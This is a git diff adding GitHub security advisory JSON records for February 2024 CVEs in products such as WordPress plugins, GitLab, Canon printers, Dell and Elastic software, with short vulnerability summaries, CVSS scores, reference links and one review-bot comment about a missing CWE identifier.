a/advisories/unreviewed/2024/02/GHSA-8gwc-m58g-hm5v/GHSA-8gwc-m58g-hm5v.json b/advisories/unreviewed/2024/02/GHSA-8gwc-m58g-hm5v/GHSA-8gwc-m58g-hm5v.json new file mode 100644 index 0000000000000..8ad919d04512f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8gwc-m58g-hm5v/GHSA-8gwc-m58g-hm5v.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gwc-m58g-hm5v", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20003" + ], + "details": "In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01191612 (MSV-981).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20003" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8gwq-mv35-rmmj/GHSA-8gwq-mv35-rmmj.json b/advisories/unreviewed/2024/02/GHSA-8gwq-mv35-rmmj/GHSA-8gwq-mv35-rmmj.json new file mode 100644 index 0000000000000..646a7b30fc2d0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8gwq-mv35-rmmj/GHSA-8gwq-mv35-rmmj.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gwq-mv35-rmmj", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6933" + ], + "details": "The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6933" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/better-search-replace/trunk/includes/class-bsr-db.php#L334" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3023674/better-search-replace/trunk/includes/class-bsr-db.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/895f2db1-a2ed-4a17-a4f6-cd13ee8f84af?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json b/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json new file mode 100644 index 0000000000000..8588b4a5e4c0c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j45-r236-3q9q", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24859" + ], + "details": "A race condition was found in the Linux kernel's net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24859" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8153" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json b/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json new file mode 100644 index 0000000000000..5ad721cc38e05 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jj6-7vgp-rg47", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2023-6840" + ], + "details": "An issue has been discovered in GitLab EE affecting all versions from 16.4 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows a maintainer to change the name of a protected branch that bypasses the security policy added to block MR.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6840" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2280292" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/435500" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8jw8-7cq8-7qcf/GHSA-8jw8-7cq8-7qcf.json b/advisories/unreviewed/2024/02/GHSA-8jw8-7cq8-7qcf/GHSA-8jw8-7cq8-7qcf.json new file mode 100644 index 0000000000000..6ab7e8eff7236 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8jw8-7cq8-7qcf/GHSA-8jw8-7cq8-7qcf.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jw8-7cq8-7qcf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0834" + ], + "details": "The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0834" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8pj9-c2gq-jhw8/GHSA-8pj9-c2gq-jhw8.json b/advisories/unreviewed/2024/02/GHSA-8pj9-c2gq-jhw8/GHSA-8pj9-c2gq-jhw8.json new file mode 100644 index 0000000000000..43054838ce87d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8pj9-c2gq-jhw8/GHSA-8pj9-c2gq-jhw8.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pj9-c2gq-jhw8", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1258" + ], + "details": "A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file api/config/params.php of the component API. The manipulation of the argument JWT_KEY_ADMIN leads to use of hard-coded cryptographic key\n . The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252997 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1258" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/XblX1My7jNV7" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252997" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252997" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-321" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8r33-q5j5-rh7g/GHSA-8r33-q5j5-rh7g.json b/advisories/unreviewed/2024/02/GHSA-8r33-q5j5-rh7g/GHSA-8r33-q5j5-rh7g.json new file mode 100644 index 0000000000000..dc8087e3d89a0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8r33-q5j5-rh7g/GHSA-8r33-q5j5-rh7g.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8r33-q5j5-rh7g", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2024-23448" + ], + "details": "An issue was discovered whereby APM Server could log at ERROR level, a response from Elasticsearch indicating that indexing the document failed and that response would contain parts of the original document. Depending on the nature of the document that the APM Server attempted to ingest, this could lead to the insertion of sensitive or private information in the APM Server logs.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23448" + }, + { + "type": "WEB", + "url": "https://discuss.elastic.co/t/apm-server-8-12-1-security-update-esa-2024-03/352688" + }, + { + "type": "WEB", + "url": "https://www.elastic.co/community/security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8rwf-rv67-3ch6/GHSA-8rwf-rv67-3ch6.json b/advisories/unreviewed/2024/02/GHSA-8rwf-rv67-3ch6/GHSA-8rwf-rv67-3ch6.json new file mode 100644 index 0000000000000..b39ed64f80fb5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8rwf-rv67-3ch6/GHSA-8rwf-rv67-3ch6.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rwf-rv67-3ch6", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-23033" + ], + "details": "Cross Site Scripting vulnerability in the path parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23033" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8vw5-wvh5-q977/GHSA-8vw5-wvh5-q977.json b/advisories/unreviewed/2024/02/GHSA-8vw5-wvh5-q977/GHSA-8vw5-wvh5-q977.json new file mode 100644 index 0000000000000..49fcd355750bf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8vw5-wvh5-q977/GHSA-8vw5-wvh5-q977.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vw5-wvh5-q977", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20827" + ], + "details": "Improper access control vulnerability in Samsung Gallery prior to version 14.5.04.4 allows physical attackers to access the picture using physical keyboard on the lockscreen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20827" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8w8f-cg25-c89c/GHSA-8w8f-cg25-c89c.json b/advisories/unreviewed/2024/02/GHSA-8w8f-cg25-c89c/GHSA-8w8f-cg25-c89c.json new file mode 100644 index 0000000000000..c930e5f42d785 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8w8f-cg25-c89c/GHSA-8w8f-cg25-c89c.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8w8f-cg25-c89c", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-24311" + ], + "details": "Path Traversal vulnerability in Linea Grafica \"Multilingual and Multistore Sitemap Pro - SEO\" (lgsitemaps) module for PrestaShop before version 1.6.6, a guest can download personal information without restriction.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24311" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/06/lgsitemaps.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T09:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json b/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json new file mode 100644 index 0000000000000..3d83b098f42d5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xmq-whfm-pq37", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22237" + ], + "details": "Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain root access to the system. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22237" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8xpr-jq7w-573j/GHSA-8xpr-jq7w-573j.json b/advisories/unreviewed/2024/02/GHSA-8xpr-jq7w-573j/GHSA-8xpr-jq7w-573j.json new file mode 100644 index 0000000000000..d1d140ee9d079 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8xpr-jq7w-573j/GHSA-8xpr-jq7w-573j.json 
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xpr-jq7w-573j", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6234" + ], + "details": "Buffer overflow in CPCA Color LUT Resource Download process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6234" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:09Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/02/GHSA-934w-fhc8-qwcj/GHSA-934w-fhc8-qwcj.json b/advisories/unreviewed/2024/02/GHSA-934w-fhc8-qwcj/GHSA-934w-fhc8-qwcj.json new file mode 100644 index 0000000000000..1d64a25c4b6d7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-934w-fhc8-qwcj/GHSA-934w-fhc8-qwcj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-934w-fhc8-qwcj", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-32454" + ], + "details": "\nDUP framework version 4.9.4.36 and prior contains insecure operation on Windows junction/Mount point vulnerability. A local malicious standard user could exploit the vulnerability to create arbitrary files, leading to denial of service\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32454" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000216236/dsa-2023-192" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1386" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-936g-qj35-5658/GHSA-936g-qj35-5658.json b/advisories/unreviewed/2024/02/GHSA-936g-qj35-5658/GHSA-936g-qj35-5658.json new file mode 100644 index 0000000000000..a4447d5032b2b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-936g-qj35-5658/GHSA-936g-qj35-5658.json 
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-936g-qj35-5658",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T00:31:28Z",
+ "aliases": [
+ "CVE-2024-21794"
+ ],
+ "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can redirect users to malicious pages through the login page.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21794"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rapidscada.org/contact/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-601"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T00:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-94f4-228x-55q7/GHSA-94f4-228x-55q7.json b/advisories/unreviewed/2024/02/GHSA-94f4-228x-55q7/GHSA-94f4-228x-55q7.json
new file mode 100644
index 0000000000000..6ec4f74de340b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-94f4-228x-55q7/GHSA-94f4-228x-55q7.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-94f4-228x-55q7",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20817"
+ ],
+ "details": "Out out bounds Write vulnerabilities in svc1td_vld_slh of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20817"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-959v-9j99-99w5/GHSA-959v-9j99-99w5.json b/advisories/unreviewed/2024/02/GHSA-959v-9j99-99w5/GHSA-959v-9j99-99w5.json
new file mode 100644
index 0000000000000..c24f461de134e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-959v-9j99-99w5/GHSA-959v-9j99-99w5.json
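Review bot: `cwe_ids` is left empty in the GHSA-94f4-228x-55q7 entry although the `details` text describes an out-of-bounds write in svc1td_vld_slh, the same bug class that the Canon entries in this batch file under CWE-787; if the NVD record agrees, `"cwe_ids": ["CWE-787"]` would make the advisory classifiable and filterable. The `details` string also carries the source typo `Out out bounds Write`; since that text is imported verbatim from the CVE record it is probably better left as-is here and fixed upstream rather than silently diverging from NVD. The local-only vector (`AV:L/.../UI:R`) is at least consistent with the "local attackers" wording.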
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-959v-9j99-99w5",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2023-32474"
+ ],
+ "details": "\nDell Display Manager application, version 2.1.1.17 and prior, contain an insecure operation on windows junction/mount point. A local malicious user could potentially exploit this vulnerability during installation leading to arbitrary folder or file deletion\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32474"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000215216/dsa-2023-182-dell"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1386"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T08:15:50Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-967w-7xjc-4wqj/GHSA-967w-7xjc-4wqj.json b/advisories/unreviewed/2024/02/GHSA-967w-7xjc-4wqj/GHSA-967w-7xjc-4wqj.json
new file mode 100644
index 0000000000000..4ea63baf3be3c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-967w-7xjc-4wqj/GHSA-967w-7xjc-4wqj.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-967w-7xjc-4wqj",
+ "modified": "2024-02-07T06:35:21Z",
+ "published": "2024-02-07T06:35:21Z",
+ "aliases": [
+ "CVE-2024-23446"
+ ],
+ "details": "An issue was discovered by Elastic, whereby the Detection Engine Search API does not respect Document-level security (DLS) or Field-level security (FLS) when querying the .alerts-security.alerts-{space_id} indices. Users who are authorized to call this API may obtain unauthorized access to documents if their roles are configured with DLS or FLS against the aforementioned index.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23446"
+ },
+ {
+ "type": "WEB",
+ "url": "https://discuss.elastic.co/t/kibana-8-12-1-security-update-esa-2024-01/352686"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.elastic.co/community/security"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T04:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-97fg-5ggq-j35p/GHSA-97fg-5ggq-j35p.json b/advisories/unreviewed/2024/02/GHSA-97fg-5ggq-j35p/GHSA-97fg-5ggq-j35p.json
new file mode 100644
index 0000000000000..07501c947ad0a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-97fg-5ggq-j35p/GHSA-97fg-5ggq-j35p.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-97fg-5ggq-j35p",
+ "modified": "2024-02-02T06:30:31Z",
+ "published": "2024-02-02T06:30:31Z",
+ "aliases": [
+ "CVE-2022-40744"
+ ],
+ "details": "IBM Aspera Faspex 5.0.6 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 236441.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40744"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/236441"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7111778"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T04:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-97rx-wgvh-p56f/GHSA-97rx-wgvh-p56f.json b/advisories/unreviewed/2024/02/GHSA-97rx-wgvh-p56f/GHSA-97rx-wgvh-p56f.json
new file mode 100644
index 0000000000000..8bec38ee9355a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-97rx-wgvh-p56f/GHSA-97rx-wgvh-p56f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-97rx-wgvh-p56f",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-24866"
+ ],
